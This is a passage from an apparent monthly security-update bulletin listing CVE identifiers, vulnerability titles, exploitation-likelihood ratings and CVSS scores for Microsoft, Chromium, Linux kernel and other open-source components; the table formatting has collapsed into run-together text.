of untrusted input in SiteIsolationn/aNoCVE-2026-8011Chromium: CVE-2026-8011 Insufficient policy enforcement in Searchn/aNoCVE-2026-8012Chromium: CVE-2026-8012 Inappropriate implementation in MHTMLn/aNoCVE-2026-8013Chromium: CVE-2026-8013 Insufficient validation of untrusted input in FedCMn/aNoCVE-2026-8014Chromium: CVE-2026-8014 Inappropriate implementation in Preloadn/aNoCVE-2026-8015Chromium: CVE-2026-8015 Inappropriate implementation in Median/aNoCVE-2026-8016Chromium: CVE-2026-8016 Use after free in WebRTCn/aNoCVE-2026-8017Chromium: CVE-2026-8017 Side-channel information leakage in Median/aNoCVE-2026-8018Chromium: CVE-2026-8018 Insufficient policy enforcement in DevToolsn/aNoCVE-2026-8019Chromium: CVE-2026-8019 Insufficient policy enforcement in WebAppn/aNoCVE-2026-8021Chromium: CVE-2026-8021 Script injection in UIn/aNoCVE-2026-8022Chromium: CVE-2026-8022 Inappropriate implementation in MHTMLn/aNoCVE-2026-33111Copilot Chat (Microsoft Edge) Information Disclosure VulnerabilityExploitation Less LikelyNo7.5CVE-2026-7896Chromium: CVE-2026-7896 Integer overflow in Blinkn/aNoCVE-2026-7897Chromium: CVE-2026-7897 Use after free in Mobilen/aNoCVE-2026-7905Chromium: CVE-2026-7905 Insufficient validation of untrusted input in Median/aNoCVE-2026-7912Chromium: CVE-2026-7912 Integer overflow in GPUn/aNoCVE-2026-7913Chromium: CVE-2026-7913 Insufficient policy enforcement in DevToolsn/aNoCVE-2026-7915Chromium: CVE-2026-7915 Insufficient data validation in DevToolsn/aNoCVE-2026-7931Chromium: CVE-2026-7931 Insufficient validation of untrusted input in iOSn/aNoCVE-2026-7941Chromium: CVE-2026-7941 Insufficient validation of untrusted input in Mobilen/aNoCVE-2026-7993Chromium: CVE-2026-7993 Insufficient validation of untrusted input in Paymentsn/aNoCVE-2026-8020Chromium: CVE-2026-8020 Uninitialized Use in GPUn/aNoCVE-2026-42838Microsoft Edge (Chromium-based) Elevation of Privilege VulnerabilityExploitation Less LikelyNo5.4CVE-2026-42891Microsoft Edge (Chromium-based) for Android Spoofing VulnerabilityExploitation UnlikelyNo6.5CVE-2026-35429Microsoft Edge (Chromium-based) for Android Spoofing VulnerabilityExploitation UnlikelyNo4.3CVE-2026-40416Microsoft Edge (Chromium-based) for Android Spoofing VulnerabilityExploitation UnlikelyNo4.3CVE-2026-41107Microsoft Edge (Chromium-based) Information Disclosure VulnerabilityExploitation Less LikelyNo7.4Developer Tools vulnerabilitiesCVETitleExploitation statusPublicly disclosed?CVSS v3 base scoreCVE-2026-42826Azure DevOps Information Disclosure VulnerabilityN/ANo10.0CVE-2026-32175.NET Core Tampering VulnerabilityExploitation Less LikelyNo4.3CVE-2026-32177.NET Elevation of Privilege VulnerabilityExploitation Less LikelyNo7.3CVE-2026-35433.NET Elevation of Privilege VulnerabilityExploitation UnlikelyNo7.3CVE-2026-42899ASP.NET Core Denial of Service VulnerabilityExploitation UnlikelyNo7.5CVE-2026-41109GitHub Copilot and Visual Studio Code Security Feature Bypass VulnerabilityExploitation Less LikelyNo8.8CVE-2026-41094Microsoft Data Formulator Remote Code Execution VulnerabilityExploitation Less LikelyNo8.8CVE-2026-41613Visual Studio Code Elevation of Privilege VulnerabilityExploitation Less LikelyNo8.8CVE-2026-41612Visual Studio Code Information Disclosure VulnerabilityExploitation Less LikelyNo5.5CVE-2026-41611Visual Studio Code Remote Code Execution VulnerabilityExploitation Less LikelyNo7.8CVE-2026-41610Visual Studio Code Security Feature Bypass VulnerabilityExploitation Less LikelyNo6.3ESU vulnerabilitiesCVETitleExploitation statusPublicly disclosed?CVSS v3 base scoreCVE-2025-54518AMD: CVE-2025-54518 CPU OP Cache CorruptionExploitation UnlikelyNoCVE-2026-41095Data Deduplication Elevation of Privilege VulnerabilityExploitation Less LikelyNo7.8CVE-2026-35424Internet Key Exchange (IKE) Protocol Denial of Service VulnerabilityExploitation UnlikelyNo7.5CVE-2026-40377Microsoft Cryptographic Services Elevation of Privilege VulnerabilityExploitation Less LikelyNo7.8CVE-2026-34329Microsoft Message Queuing (MSMQ) Remote Code Execution VulnerabilityExploitation Less LikelyNo8.8CVE-2026-41097Secure Boot Security Feature Bypass VulnerabilityExploitation Less LikelyNo6.7CVE-2026-33839Win32k Elevation of Privilege VulnerabilityExploitation UnlikelyNo7.0CVE-2026-34330Win32k Elevation of Privilege VulnerabilityExploitation UnlikelyNo7.8CVE-2026-34331Win32k Elevation of Privilege VulnerabilityExploitation UnlikelyNo7.0CVE-2026-35423Windows 11 Telnet Client Information Disclosure VulnerabilityExploitation UnlikelyNo5.4CVE-2026-34344Windows Ancillary Function Driver for WinSock Elevation of Privilege VulnerabilityExploitation Less LikelyNo7.8CVE-2026-34345Windows Ancillary Function Driver for WinSock Elevation of Privilege VulnerabilityExploitation Less LikelyNo7.0CVE-2026-35416Windows Ancillary Function Driver for WinSock Elevation of Privilege VulnerabilityExploitation More LikelyNo7.0CVE-2026-41088Windows Ancillary Function Driver for WinSock Elevation of Privilege VulnerabilityExploitation UnlikelyNo7.8CVE-2026-34343Windows Application Identity (AppID) Subsystem Elevation of Privilege VulnerabilityExploitation Less LikelyNo7.8CVE-2026-35418Windows Cloud Files Mini Filter Driver Elevation of Privilege VulnerabilityExploitation UnlikelyNo7.8CVE-2026-33835Windows Cloud Files Mini Filter Driver Elevation of Privilege VulnerabilityExploitation More LikelyNo7.8CVE-2026-34337Windows Cloud Files Mini Filter Driver Elevation of Privilege VulnerabilityExploitation Less LikelyNo7.8CVE-2026-40407Windows Common Log File System Driver Elevation of Privilege VulnerabilityExploitation UnlikelyNo7.8CVE-2026-40397Windows Common Log File System Driver Elevation of Privilege VulnerabilityExploitation More LikelyNo7.8CVE-2026-34336Windows DWM Core Library Information Disclosure VulnerabilityExploitation UnlikelyNo7.8CVE-2026-33834Windows Event Logging Service Elevation of Privilege VulnerabilityExploitation Less LikelyNo7.8CVE-2026-32209Windows Filtering Platform (WFP) Security Feature Bypass VulnerabilityExploitation UnlikelyNo4.4CVE-2026-35421Windows GDI Remote Code Execution VulnerabilityExploitation UnlikelyNo7.8CVE-2026-40403Windows Graphics Component Remote Code Execution VulnerabilityExploitation Less LikelyNo8.8CVE-2026-33841Windows Kernel Elevation of Privilege VulnerabilityExploitation More LikelyNo7.8CVE-2026-35420Windows Kernel Elevation of Privilege VulnerabilityExploitation Less LikelyNo7.8CVE-2026-34339Windows Lightweight Directory Access Protocol (LDAP) Denial of Service VulnerabilityExploitation Less LikelyNo5.5CVE-2026-34341Windows Link-Layer Discovery Protocol (LLDP) Elevation of Privilege VulnerabilityExploitation Less LikelyNo7.0CVE-2026-33838Windows Message Queuing (MSMQ) Elevation of Privilege VulnerabilityExploitation Less LikelyNo7.8CVE-2026-32161Windows Native WiFi Miniport Driver Remote Code Execution VulnerabilityExploitation Less LikelyNo7.5CVE-2026-41089Windows Netlogon Remote Code Execution VulnerabilityExploitation Less LikelyNo9.8CVE-2026-34342Windows Print Spooler Elevation of Privilege VulnerabilityExploitation Less LikelyNo7.0CVE-2026-34340Windows Projected File System Elevation of Privilege VulnerabilityExploitation Less LikelyNo7.0CVE-2026-40398Windows Remote Desktop Services Elevation of Privilege VulnerabilityExploitation More LikelyNo7.8CVE-2026-21530Windows Rich Text Edit Elevation of Privilege VulnerabilityExploitation Less LikelyNo6.7CVE-2026-32170Windows Rich Text Edit Elevation of Privilege VulnerabilityExploitation Less LikelyNo6.7CVE-2026-40410Windows SMB Client Elevation of Privilege VulnerabilityExploitation Less LikelyNo7.0CVE-2026-35415Windows Storage Spaces Controller Elevation of Privilege VulnerabilityExploitation Less LikelyNo7.8CVE-2026-40414Windows TCP/IP Denial of Service VulnerabilityExploitation UnlikelyNo7.4CVE-2026-40401Windows TCP/IP Denial of Service VulnerabilityExploitation UnlikelyNo7.1CVE-2026-40413Windows TCP/IP Denial of Service VulnerabilityExploitation Less LikelyNo7.4CVE-2026-35422Windows TCP/IP Driver Security Feature Bypass VulnerabilityExploitation UnlikelyNo6.5CVE-2026-34351Windows TCP/IP Elevation of Privilege VulnerabilityExploitation Less LikelyNo7.8CVE-2026-40399Windows TCP/IP Elevation of Privilege VulnerabilityExploitation Less LikelyNo7.8CVE-2026-34334Windows TCP/IP Elevation of Privilege VulnerabilityExploitation UnlikelyNo7.8CVE-2026-40406Windows TCP/IP Information Disclosure VulnerabilityExploitation Less LikelyNo7.5CVE-2026-33837Windows TCP/IP Local Elevation of Privilege VulnerabilityExploitation More LikelyNo7.8CVE-2026-40415Windows TCP/IP Remote Code Execution VulnerabilityExploitation UnlikelyNo8.1CVE-2026-42825Windows Telephony Service Elevation of Privilege VulnerabilityExploitation UnlikelyNo7.0CVE-2026-34338Windows Telephony Service Elevation of Privilege VulnerabilityExploitation Less LikelyNo7.8CVE-2026-40382Windows Telephony Service Elevation of Privilege VulnerabilityExploitation Less LikelyNo7.8CVE-2026-40380Windows Volume Manager Extension Driver Remote Code Execution VulnerabilityExploitation Less LikelyNo6.2CVE-2026-40408Windows WAN ARP Driver Elevation of Privilege VulnerabilityExploitation Less LikelyNo7.8CVE-2026-34333Windows Win32k Elevation of Privilege VulnerabilityExploitation Less LikelyNo7.8CVE-2026-34347Windows Win32k Elevation of Privilege VulnerabilityExploitation Less LikelyNo7.0CVE-2026-35417Windows Win32k Elevation of Privilege VulnerabilityExploitation More LikelyNo7.8Mariner vulnerabilitiesCVETitleExploitation statusPublicly disclosed?CVSS v3 base scoreCVE-2026-7598libssh2 userauth.c userauth_password integer overflown/aNo7.3CVE-2026-43870Apache Thrift: Node.js web_server.js multi-vulnerabilityn/aNo7.3CVE-2026-43868Apache Thrift: Rust implementation vulnerable to CVE-2020-13949 patternn/aNo5.3CVE-2026-43869Apache Thrift: TSSLTransportFactory.java hostname verificationn/aNo7.3Microsoft Dynamics vulnerabilitiesCVETitleExploitation statusPublicly disclosed?CVSS v3 base scoreCVE-2026-33821Microsoft Dynamics 365 Customer Insights Elevation of Privilege VulnerabilityN/ANo7.7CVE-2026-40417Microsoft Dynamics 365 Business Central Elevation of Privilege VulnerabilityExploitation Less LikelyNo7.8CVE-2026-42898Microsoft Dynamics 365 On-Premises Remote Code Execution VulnerabilityExploitation UnlikelyNo9.9CVE-2026-42833Microsoft Dynamics 365 On-Premises Remote Code Execution VulnerabilityExploitation Less LikelyNo9.1CVE-2026-40374Microsoft Power Automate Desktop Information Disclosure VulnerabilityExploitation Less LikelyNo6.5Open Source Software vulnerabilitiesCVETitleExploitation statusPublicly disclosed?CVSS v3 base scoreCVE-2026-31706ksmbd: validate num_aces and harden ACE walk in smb_inherit_dacl()n/aNo8.8CVE-2026-31723usb: gadget: f_subset: Fix net_device lifecycle with device_moven/aNo7.8CVE-2026-31724usb: gadget: f_eem: Fix net_device lifecycle with device_moven/aNo7.8CVE-2026-43053xfs: close crash window in attr dabtree inactivationn/aNo5.5CVE-2026-43048HID: core: Mitigate potential OOB by removing bogus memset()n/aNo8.8CVE-2026-31777ALSA: ctxfi: Check the error for index mappingn/aNo7.0CVE-2026-31722usb: gadget: f_rndis: Fix net_device lifecycle with device_moven/aNo7.8CVE-2026-43036net: use skb_header_pointer() for TCPv4 GSO frag_off checkn/aNo5.5CVE-2026-31769gpib: fix use-after-free in IO ioctl handlersn/aNoCVE-2026-31707ksmbd: validate response sizes in ipc_validate_msg()n/aNo7.1CVE-2026-31725usb: gadget: f_ecm: Fix net_device lifecycle with device_moven/aNo7.8CVE-2026-43049HID: logitech-hidpp: Prevent use-after-free on force feedback initialisation failuren/aNo7.0CVE-2026-43022Bluetooth: hci_sync: hci_cmd_sync_queue_once() return -EEXIST if existsn/aNoCVE-2026-43042mpls: add seqcount to protect the platform_label{,s} pairn/aNo7.1CVE-2026-31771Bluetooth: hci_event: move wake reason storage into validated event handlersn/aNo8.1CVE-2026-43052wifi: mac80211: check tdls flag in ieee80211_tdls_opern/aNo7.0CVE-2026-31709smb: client: validate the whole DACL before rewriting it in cifsacln/aNo8.8CVE-2026-43021Bluetooth: hci_sync: fix leaks when hci_cmd_sync_queue_once failsn/aNoCVE-2026-31712ksmbd: require minimum ACE size in smb_check_perm_dacl()n/aNo8.3CVE-2026-43010bpf: Reject sleepable kprobe_multi programs at attach timen/aNo5.5CVE-2026-43019Bluetooth: hci_conn: fix potential UAF in set_cig_params_syncn/aNo7.8CVE-2026-31729usb: typec: ucsi: validate connector number in ucsi_notify_common()n/aNo7.0CVE-2026-43045mshv: Fix error handling in mshv_region_pinn/aNoCVE-2026-43009bpf: Fix incorrect pruning due to atomic fetch precision trackingn/aNo7.8CVE-2026-31715f2fs: fix UAF caused by decrementing sbi->nr_pages[] in f2fs_write_end_io()n/aNo5.5CVE-2026-31697crypto: ccp: Don't attempt to copy ID to userspace if PSP command failedn/aNo7.1CVE-2026-31721usb: gadget: f_hid: move list and spinlock inits from bind to allocn/aNo7.8CVE-2026-31711smb: server: fix active_num_conn leak on transport allocation failuren/aNo7.5CVE-2026-31699crypto: ccp: Don't attempt to copy CSR to userspace if PSP command failedn/aNo7.1CVE-2026-31694fuse: reject oversized dirents in page cachen/aNo7.8CVE-2026-31705ksmbd: fix out-of-bounds write in smb2_get_ea() EA alignmentn/aNo9.8CVE-2026-43033crypto: authencesn - Do not place hiseq at end of dst for out-of-place decryptionn/aNo7.8CVE-2026-31696rxrpc: Fix missing validation of ticket length in non-XDR key preparsingn/aNo5.5CVE-2026-31698crypto: ccp: Don't attempt to copy PDH cert to userspace if PSP command failedn/aNo7.1CVE-2026-31704ksmbd: use check_add_overflow() to prevent u16 DACL size overflown/aNo7.5CVE-2026-31702f2fs: fix use-after-free of sbi in f2fs_compress_write_end_io()n/aNo7.8CVE-2026-31708smb: client: fix OOB read in smb2_ioctl_query_info QUERY_INFO pathn/aNo8.1CVE-2026-31700net/packet: fix TOCTOU race on mmap'd vnet_hdr in tpacket_snd()n/aNo7.8CVE-2026-7598libssh2 userauth.c userauth_password integer overflown/aNo7.3CVE-2026-43058media: vidtv: fix pass-by-value structs causing MSAN warningsn/aNo7.1CVE-2026-37457n/aNo7.5CVE-2026-43964n/aNo3.7CVE-2026-43037ip6_tunnel: clear skb2->cb[] in ip4ip6_err()n/aNo7.0CVE-2026-33190CoreDNS TSIG authentication bypass on encrypted DNS transportsn/aNoCVE-2026-33489CoreDNS transfer plugin subzone ACL bypass via lexicographic zone comparisonn/aNoCVE-2026-32936CoreDNS DoH GET path missing size validation causes CPU and memory amplificationn/aNoCVE-2026-32934CoreDNS DNS-over-QUIC unbounded goroutine growth leads to denial of servicen/aNoCVE-2026-35579CoreDNS TSIG authentication bypass on gRPC, QUIC, DoH, and DoH3 transportsn/aNoCVE-2026-43073x86-64: rename misleadingly named '__copy_user_nocache()' functionn/aNo2.5CVE-2026-42151Prometheus Azure AD remote write OAuth client secret exposed via config APIn/aNo7.5CVE-2026-42154Prometheus: remote read endpoint allows denial of service via crafted snappy payloadn/aNo7.5CVE-2026-43125dlm: validate length in dlm_search_rsb_treen/aNo7.8CVE-2026-43248vhost: move vdpa group bound check to vhost_vdpan/aNo7.1CVE-2026-43176wifi: rtw89: pci: validate release report content before using for RTL8922DEn/aNo7.0CVE-2026-43204ASoC: qcom: q6asm: drop DSP responses for closed data streamsn/aNo5.5CVE-2026-43131drm/amd/pm: Fix null pointer dereference issuen/aNo5.5CVE-2026-43126ALSA: mixer: oss: Add card disconnect checkpointsn/aNo5.5CVE-2026-43127ntfs3: fix circular locking dependency in run_unpack_exn/aNo5.5CVE-2026-43161iommu/vt-d: Skip dev-iotlb flush for inaccessible PCIe device without scalable moden/aNo5.5CVE-2026-43198tcp: fix potential race in tcp_v6_syn_recv_sock()n/aNo4.8CVE-2026-43245ntfs: ->d_compare() must not blockn/aNo7.1CVE-2025-71290misc: ti_fpc202: fix a potential memory leak in probe functionn/aNo5.5CVE-2026-43137ASoC: SOF: Intel: hda: Fix NULL pointer dereferencen/aNo5.5CVE-2026-43115srcu: Use irq_work to start GP in tiny SRCUn/aNo5.5CVE-2026-43234team: avoid NETDEV_CHANGEMTU event when unregistering slaven/aNo5.5CVE-2025-71293drm/amdgpu/ras: Move ras data alloc before bad page checkn/aNo5.5CVE-2026-43172wifi: iwlwifi: fix 22000 series SMEM parsingn/aNo5.3CVE-2025-71285net: qrtr: Drop the MHI auto_queue feature for IPCR DL channelsn/aNo4.7CVE-2026-43197netconsole: avoid OOB reads, msg is not nul-terminatedn/aNo5.5CVE-2026-43185ksmbd: fix signededness bug in smb_direct_prepare_negotiation()n/aNo5.5CVE-2025-71273wifi: rtw88: Use devm_kmemdup() in rtw_set_supported_band()n/aNo5.3CVE-2026-43118btrfs: fix zero size inode with non-zero size after log replayn/aNo3.3CVE-2026-43109x86: shadow stacks: proper error handling for mmap lockn/aNo7.1CVE-2026-43153xfs: remove xfs_attr_leaf_hasnamen/aNo7.1CVE-2026-43129ima: verify the previous kernel's IMA buffer lies in addressable RAMn/aNo5.5CVE-2026-43116netfilter: ctnetlink: ensure safe access to master conntrackn/aNo7.1CVE-2026-43274mailbox: mchp-ipc-sbi: fix out-of-bounds access in mchp_ipc_get_cluster_aggr_irq()n/aNo7.1CVE-2026-43244kcm: fix zero-frag skb in frag_list on partial sendmsg errorn/aNo5.5CVE-2026-43191drm/amd/display: Adjust PHY FSM transition to TX_EN-to-PLL_ON for TMDS on DCN35n/aNo5.5CVE-2026-43258alpha: fix user-space corruption during memory compactionn/aNo5.5CVE-2025-71289fs/ntfs3: handle attr_set_size() errors when truncating filesn/aNo7.1CVE-2026-43107xfrm: account XFRMA_IF_ID in aevent size calculationn/aNo5.5CVE-2026-43243drm/amd/display: Add signal type check for dcn401 get_phyd32clk_srcn/aNo5.5CVE-2025-71294drm/amdgpu: fix NULL pointer issue buffer funcsn/aNo5.5CVE-2026-43250usb: chipidea: udc: fix DMA and SG cleanup in _ep_nuke()n/aNo7.1CVE-2026-43237drm/amdgpu: Refactor amdgpu_gem_va_ioctl for Handling Last Fence Update and Timeline Management v4n/aNo5.5CVE-2026-43201APEI/GHES: ARM processor Error: don't go past allocated memoryn/aNo5.5CVE-2026-43219net: cpsw_new: Fix potential unregister of netdev that has not been registered yetn/aNo7.1CVE-2026-43165hwmon: (nct7363) Fix a resource leak in nct7363_present_pwm_faninn/aNo5.5CVE-2026-43088net: af_key: zero aligned sockaddr tail in PF_KEY exportsn/aNo7.1CVE-2026-43195drm/amdgpu: validate user queue size constraintsn/aNo7.1CVE-2025-71272most: core: fix resource leak in most_register_interface error pathsn/aNo5.5CVE-2026-43213wifi: rtw89: pci: validate sequence number of TX release reportn/aNo7.0CVE-2026-43228hfs: Replace BUG_ON with error handling for CNID count checksn/aNo7.1CVE-2026-43216net: Drop the lock in skb_may_tx_timestamp()n/aNo5.5CVE-2026-43119Bluetooth: hci_sync: annotate data-races around hdev->req_statusn/aNo5.3CVE-2026-43267wifi: rtw89: fix potential zero beacon interval in beacon trackingn/aNo7.0CVE-2026-43101ipv6: ioam: fix potential NULL dereferences in __ioam6_fill_trace_data()n/aNo7.0CVE-2026-43199net/mlx5e: Fix "scheduling while atomic" in IPsec MAC address queryn/aNo7.0CVE-2026-43083net: ioam6: fix OOB and missing lockn/aNo7.0CVE-2026-43870Apache Thrift: Node.js web_server.js multi-vulnerabilityn/aNo7.3CVE-2026-43868Apache Thrift: Rust implementation vulnerable to CVE-2020-13949 patternn/aNo5.3CVE-2026-33523Apache HTTP Server: multiple modules: HTTP response splitting forwarding malicious status linen/aNo6.5CVE-2026-23918Apache HTTP Server: http2: double free and possible RCE on early resetn/aNo8.8CVE-2026-34059Apache HTTP Server: mod_proxy_ajp: Heap Over-Read and memory disclosure in ajp_parse_data()n/aNo7.5CVE-2026-34032Apache HTTP Server: mod_proxy_ajp: Heap Buffer Over-Read Due to Missing Null-Termination Check (ajp_msg_get_string)n/aNo5.3CVE-2026-24072Apache HTTP Server: mod_rewrite elevation of privileges via ap_exprn/aNo8.8CVE-2026-33006Apache HTTP Server: mod_auth_digest timing attackn/aNo4.8CVE-2026-33007Apache HTTP Server: mod_authn_socache crashn/aNo5.3CVE-2026-29169Apache HTTP Server: mod_dav_lock indirect lock crashn/aNo7.5CVE-2026-29168Apache HTTP Server: mod_md unrestricted OCSP responsen/aNo7.3CVE-2026-33857Apache HTTP Server: Off-by-one OOB reads in AJP getter functionsn/aNo5.3CVE-2026-41672xmldom: XML node injection through unvalidated comment serializationn/aNoCVE-2026-41674xmldom: XML injection through unvalidated DocumentType serializationn/aNoCVE-2026-41675xmldom: XML node injection through unvalidated processing instruction serializationn/aNoCVE-2026-41673xmldom: Denial of service via uncontrolled recursion in XML serializationn/aNoCVE-2026-25243redis-server RESTORE invalid memory access may allow remote code executionn/aNoCVE-2026-23631redis-server Lua use-after-free may allow remote code executionn/aNoCVE-2026-31717ksmbd: validate owner of durable handle on reconnectn/aNo8.8CVE-2026-31718ksmbd: fix use-after-free in __ksmbd_close_fd() via durable scavengern/aNo9.8CVE-2026-23479redis-server use-after-free in unblock client flow may allow remote code executionn/aNoCVE-2026-25588RedisTimeSeries RESTORE invalid memory access may allow remote code executionn/aNoCVE-2026-25589RedisBloom RESTORE invalid memory access may allow remote code executionn/aNoCVE-2026-43474fs: init flags_valid before calling vfs_fileattr_getn/aNoCVE-2026-43338btrfs: reserve enough transaction items for qgroup ioctlsn/aNoCVE-2025-71302drm/panthor: fix for dma-fence safe access rulesn/aNoCVE-2026-43318drm/amdgpu: fix sync handling in amdgpu_dma_buf_move_notifyn/aNo7.1CVE-2026-43309md raid: fix hang when stopping arrays with metadata through dm-raidn/aNo5.5CVE-2026-43416powerpc, perf: Check that current->mm is alive before getting user callchainn/aNoCVE-2025-71299spi: cadence-quadspi: Parse DT for flashes with the rest of the DT parsingn/aNo5.5CVE-2026-43284xfrm: esp: avoid in-place decrypt on shared skb fragsn/aNo7.8CVE-2026-43352i3c: mipi-i3c-hci: Correct RING_CTRL_ABORT handling in DMA dequeuen/aNo5.5CVE-2026-43300drm/panel: Fix a possible null-pointer dereference in jdi_panel_dsi_remove()n/aNo5.5CVE-2026-43331x86/kexec: Disable KCOV instrumentation after load_segments()n/aNoCVE-2026-43320drm/amd/display: Fix dsc eDP issuen/aNoCVE-2026-43306bpf: crypto: Use the correct destructor kfunc typen/aNo7.0CVE-2026-43443ASoC: amd: acp-mach-common: Add missing error check for clock acquisitionn/aNoCVE-2026-43317most: core: fix leak on early registration failuren/aNoCVE-2026-43319spi: spidev: fix lock inversion between spi_lock and buf_lockn/aNoCVE-2026-43303mm/page_alloc: clear page->private in free_pages_prepare()n/aNo7.0CVE-2026-43344perf/x86/intel/uncore: Fix die ID init and look up bugsn/aNoCVE-2026-43321bpf: Properly mark live registers for indirect jumpsn/aNo7.8CVE-2026-43456bonding: fix type confusion in bond_setup_by_slave()n/aNo5.5CVE-2026-43305drm/amd/display: Fix mismatched unlock for DMUB HW lock in HWSS fast pathn/aNo5.5CVE-2026-43298drm/amdgpu: Skip vcn poison irq release on VFn/aNo7.8CVE-2026-43299btrfs: do not ASSERT() when the fs flips RO inside btrfs_repair_io_failure()n/aNo5.5CVE-2026-43400drm/amdgpu: add upper bound check on user inputs in signal ioctln/aNoCVE-2026-43310media: verisilicon: Avoid G2 bus error while decoding H.264 and HEVCn/aNo5.5CVE-2026-43294drm: renesas: rz-du: mipi_dsi: fix kernel panic when rebooting for some panelsn/aNo5.5CVE-2026-43353i3c: mipi-i3c-hci: Fix race in DMA ring dequeuen/aNo7.8CVE-2026-43292mm/vmalloc: prevent RCU stalls in kasan_release_vmalloc_noden/aNo5.5CVE-2026-43398drm/amdgpu: add upper bound check on user inputs in wait ioctln/aNoCVE-2026-43311soc/tegra: pmc: Fix unsafe generic_handle_irq() calln/aNo5.5CVE-2026-43421usb: gadget: f_ncm: Fix net_device lifecycle with device_moven/aNoCVE-2026-43308btrfs: don't BUG() on unexpected delayed ref type in run_one_delayed_ref()n/aNo5.5CVE-2026-37458n/aNo6.5CVE-2026-37459n/aNo7.5CVE-2026-33846Gnutls: gnutls: denial of service via heap buffer overflow in dtls handshake fragment reassemblyn/aNo7.5CVE-2026-6664PgBouncer integer overflow in PgBouncer network packet parsingn/aNo7.5CVE-2026-6665PgBouncer buffer overflow in SCRAMn/aNo8.1CVE-2026-6667PgBouncer missing authorization check in KILL_CLIENT admin commandn/aNo4.3CVE-2026-6666PgBouncer crash in kill_pool_logins_server_errorn/aNo5.9CVE-2026-45130Vim: Heap Buffer Overflow in spell file loadingn/aNo6.6CVE-2026-44656Vim: OS Command Injection via 'path' completionn/aNoCVE-2026-33811Crash when handling long CNAME response in netn/aNo7.5CVE-2026-33814Infinite loop in HTTP/2 transport when given bad SETTINGS_MAX_FRAME_SIZE in net/http/internal/http2 in golang.org/x/netn/aNo7.5CVE-2026-39817Invoking "go tool pack" does not sanitize output paths in cmd/gon/aNo5.9CVE-2026-39819Invoking "go bug" follows symlinks in predictable temporary filenames in cmd/gon/aNo5.3CVE-2026-39820Quadratic string concatentation in consumeComment in net/mailn/aNo7.5CVE-2026-39823Bypass of meta content URL escaping causes XSS in html/templaten/aNo6.1CVE-2026-39825ReverseProxy forwards queries with more than urlmaxqueryparams parameters in net/http/httputiln/aNo5.3CVE-2026-39826Escaper bypass leads to XSS in html/templaten/aNo6.1CVE-2026-39836Panic in Dial and LookupPort when handling NUL byte on Windows in netn/aNo7.5CVE-2026-42499Quadratic string concatenation in consumePhrase in net/mailn/aNo7.5CVE-2026-42501Malicious module proxy can bypass checksum database in cmd/gon/aNo7.5CVE-2026-33079Mistune ReDoS in LINK_TITLE_RE allows denial of service with crafted Markdown titlesn/aNoCVE-2026-41889pgx: SQL Injection via placeholder confusion with dollar quoted string literalsn/aNoCVE-2026-42257net-imap: Command Injection via "raw" arguments to multiple commandsn/aNoCVE-2026-42258net-imap: Command Injection via unvalidated Symbol inputsn/aNoCVE-2026-42256net-imap: Denial of service via high iteration count for `SCRAM-*` authenticationn/aNoCVE-2026-42246net-imap vulnerable to STARTTLS stripping via invalid response timingn/aNoCVE-2026-45186n/aNo2.9CVE-2026-7261SoapServer session-persisted object use-after-free via SOAP header faultn/aNoCVE-2026-7258Out-of-bounds read in urldecode() on NetBSDn/aNoCVE-2026-6722Use-After-Free in SOAP using Apache mapn/aNoCVE-2026-6735XSS within PHP-FPM status endpointn/aNoCVE-2026-7262NULL pointer dereference in SOAP apache:Map decoder with missing n/aNoCVE-2025-14179SQL injection in pdo_firebird via NUL bytes in quoted stringsn/aNoCVE-2026-7568Signed integer overflow in metaphone()n/aNoCVE-2026-7259Null pointer dereference in php_mb_check_encoding() via mb_ereg_search_init()n/aNoCVE-2026-43500rxrpc: Also unshare DATA/RESPONSE packets when paged frags are presentn/aNo7.8SQL Server vulnerabilitiesCVETitleExploitation statusPublicly disclosed?CVSS v3 base scoreCVE-2026-40370SQL Server Remote Code Execution VulnerabilityExploitation Less LikelyNo8.8Windows vulnerabilitiesCVETitleExploitation statusPublicly disclosed?CVSS v3 base scoreCVE-2025-54518AMD: CVE-2025-54518 CPU OP Cache CorruptionExploitation UnlikelyNoCVE-2026-41095Data Deduplication Elevation of Privilege VulnerabilityExploitation Less LikelyNo7.8CVE-2026-35424Internet Key Exchange (IKE) Protocol Denial of Service VulnerabilityExploitation UnlikelyNo7.5CVE-2026-40377Microsoft Cryptographic Services Elevation of Privilege VulnerabilityExploitation Less LikelyNo7.8CVE-2026-34329Microsoft Message Queuing (MSMQ) Remote Code Execution VulnerabilityExploitation Less LikelyNo8.8CVE-2026-41097Secure Boot Security Feature Bypass VulnerabilityExploitation Less LikelyNo6.7CVE-2026-33839Win32k Elevation of Privilege VulnerabilityExploitation UnlikelyNo7.0CVE-2026-33840Win32k Elevation of Privilege VulnerabilityExploitation More LikelyNo7.8CVE-2026-34330Win32k Elevation of Privilege VulnerabilityExploitation UnlikelyNo7.8CVE-2026-34331Win32k Elevation of Privilege VulnerabilityExploitation UnlikelyNo7.0CVE-2026-35423Windows 11 Telnet Client Information Disclosure VulnerabilityExploitation UnlikelyNo5.4CVE-2026-35438Windows Admin Center Elevation of Privilege VulnerabilityExploitation Less LikelyNo8.3CVE-2026-34344Windows Ancillary Function Driver for WinSock Elevation of Privilege VulnerabilityExploitation Less LikelyNo7.8CVE-2026-34345Windows Ancillary Function Driver for WinSock Elevation of Privilege VulnerabilityExploitation Less LikelyNo7.0CVE-2026-35416Windows Ancillary Function Driver for WinSock Elevation of Privilege VulnerabilityExploitation More LikelyNo7.0CVE-2026-41088Windows Ancillary Function Driver for WinSock Elevation of Privilege VulnerabilityExploitation UnlikelyNo7.8CVE-2026-34343Windows Application Identity (AppID) Subsystem Elevation of Privilege VulnerabilityExploitation Less LikelyNo7.8CVE-2026-35418Windows Cloud Files Mini Filter Driver Elevation of Privilege VulnerabilityExploitation UnlikelyNo7.8CVE-2026-33835Windows Cloud Files Mini Filter Driver Elevation of Privilege VulnerabilityExploitation More LikelyNo7.8CVE-2026-34337Windows Cloud Files Mini Filter Driver Elevation of Privilege VulnerabilityExploitation Less LikelyNo7.8CVE-2026-40407Windows Common Log File System Driver Elevation of Privilege VulnerabilityExploitation UnlikelyNo7.8CVE-2026-40397Windows Common Log File System Driver Elevation of Privilege VulnerabilityExploitation More LikelyNo7.8CVE-2026-41096Windows DNS Client Remote Code Execution VulnerabilityExploitation UnlikelyNo9.8CVE-2026-42896Windows DWM Core Library Elevation of Privilege VulnerabilityExploitation Less LikelyNo7.8CVE-2026-35419Windows DWM Core Library Information Disclosure VulnerabilityExploitation Less LikelyNo5.5CVE-2026-34336Windows DWM Core Library Information Disclosure VulnerabilityExploitation UnlikelyNo7.8CVE-2026-33834Windows Event Logging Service Elevation of Privilege 